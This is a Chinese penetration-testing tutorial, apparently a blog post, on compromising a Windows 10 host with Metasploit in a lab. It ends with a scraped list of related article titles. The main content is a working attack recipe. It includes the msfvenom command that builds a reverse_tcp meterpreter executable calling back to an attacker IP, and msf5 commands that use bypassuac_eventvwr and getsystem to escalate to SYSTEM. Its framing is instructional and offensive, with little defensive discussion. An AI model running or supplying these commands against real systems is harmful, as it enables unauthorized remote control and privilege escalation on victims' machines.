在进行入侵检测之前,配置好网络环境,使其相互连通,才能进行入侵。在使用Metasploit成功入侵之后拿到的只是一个基础的shell,要想拿到系统级别的shell,添加系统用户,获取用户登录口令,还需要进一步提权。
一、Metasploit对windows 10入侵测试
环境
攻击机:Kali Linux 2019                ip:192.168.5.11
目标主机:Windows 10                 ip:192.168.2.104
1.1生成exe文件,并在目标主机打开

  msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.11 LPORT=1000 -f exe -o met.exe

1.2.设置payload,设置本地IP和监听端口

1.3.运行入侵测试,并获得基础的shell

二、输入background隐藏此界面,然后进一步提权

msf5> use exploit/windows/local/bypassuac_eventvwr
msf5 exploit(bypassuac) > set session 3
msf5 exploit(bypassuac) > exploit
然会生成另一个session,可以进行提权操作了,提权过程中并不需要设置端口号了,默认4444即可


2.1.输入命令gesystem提权,第一次getuid,显示普通用户权限,第二次是系统权限

2.2.获得shell之后,敲入dir命令乱码显示,只要输入chcp 65001,即可解决

Kali Linux渗透测试--windows 10入侵和提权过程相关推荐

  1. Kali Linux 渗透测试 博客记录

    本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的<Kali Linux 渗透测试>课程 文章为长时间连载,内容具有连续性,禁止转载! --- ...

  2. Kali Linux渗透测试——MSF基础篇

    笔记内容参考安全牛课堂苑房弘老师的Kali Linux渗透测试教程 Metasploit是目前最流行.最强大.最具扩展性的渗透测试平台,一定程度上统一了渗透测试和漏洞研究的工作环境,使得新的攻击代码比 ...

  3. Kali Linux渗透测试——信息收集

    笔记内容参考安全牛课堂苑房弘老师的Kali Linux渗透测试教程 渗透测试标准(PTES:http://www.pentest-standard.org)的七个阶段: 1.前期交互阶段:讨论确定渗透 ...

  4. 《Kali Linux渗透测试的艺术》—第2章2.3节安全测试方法论

    本节书摘来自异步社区<Kali Linux渗透测试的艺术>一书中的第2章2.3节安全测试方法论,作者[英]Lee Allen , [印尼]Tedi Heriyanto , [英]Shake ...

  5. Kali Linux渗透测试 073 扫描工具-Vega

    本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的<Kali Linux 渗透测试>课程 vega 简介 使用基本流程 扫描的基本使用 使用截 ...

  6. 视频教程-Kali Linux渗透测试全程课与脚本语言编程系列课程-渗透测试

    Kali Linux渗透测试全程课与脚本语言编程系列课程 本人有多年的服务器高级运维与开发经验,擅长计算机与服务器攻防及网络攻防技术!对网络安全领域有持续的关注和研究! 林晓炜 ¥899.00 立即订 ...

  7. KALI LINUX渗透测试学习笔记

    KALI LINUX渗透测试学习笔记 (苑房弘主讲) 第1章 课程介绍 任务1:Kali Linux渗透测试介绍.exe 安全问题的根源: 分层思想 只求功能实现 最大的威胁是人 渗透测试: 尝试挫败 ...

  8. Kali Linux渗透测试——无线渗透

    笔记内容参考安全牛课堂苑房弘老师的Kali Linux渗透测试教程,以及文章: https://blog.csdn.net/qq_38265137/article/details/80370554 h ...

  9. Kali Linux渗透测试 093 自动注入-Sqlmap

    本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的<Kali Linux 渗透测试>课程 Kali Linux渗透测试(苑房弘)博客记录 1. ...

最新文章

  1. 《数据科学家养成手册》第十章--混沌论
  2. C++开源跨平台类库集
  3. Python核心模块——urllib模块
  4. Exchange server 2010 beta安装部署流程
  5. dataTables中文文档API和样例
  6. 你可以去学python_你是怎么学好Python的?
  7. 《等离子体所毕业生经验分享会》观后感 2020-07-03
  8. 2020年后台开发程序员应该学习的8大技术
  9. 实用垃圾收集,第1部分–简介
  10. PIE SDK矢量数据的读取
  11. ubuntu linux运行exe文件,Linux Ubuntu 打开.exe文件
  12. linux与windows共享(四)
  13. Elasticjob安装与入门
  14. 2021年下半年软件设计师下午真题及答案解析
  15. linux卸载kodi,如何在Ubuntu 18.04上安装Kodi
  16. 电信套餐2020一览表_移动联通接连放大招,5G 套餐要降价?
  17. 脊髓空洞症先知先觉早期症状
  18. 顶部BANNER广告图片放大后再自动缩小消失
  19. veek-soc-iii_所以您想使用招聘人员第III部分-警告
  20. mesh 协调器 路由器_为什么WiFi6和MESH是绝配

热门文章

  1. java 大文件上传 断点续传(Socket、IO流)
  2. 使用 apifm-wxapi 开发微信小程序之用户信息/实名认证
  3. 全球与中国1,3-环己二甲胺行业需求动态及投资前景预测报告(2022-2027)
  4. 让自己对bff层有个了解--服务于前端的后端
  5. 计算机公式乘以百分之十五,EXCEL表格数据乘以15的公式【EXCEL表格中可以套用公式来实现输入数据后自动乘以某个数据的计算吗?】...
  6. 高数上册第七章小结笔记
  7. Windows install.
  8. 一秒钟看懂SaaS、CRM、OA、ERP、HR、进销存
  9. win10英语语言包
  10. micro-app-vue2 vue3 超详细快速入门指南 学习记录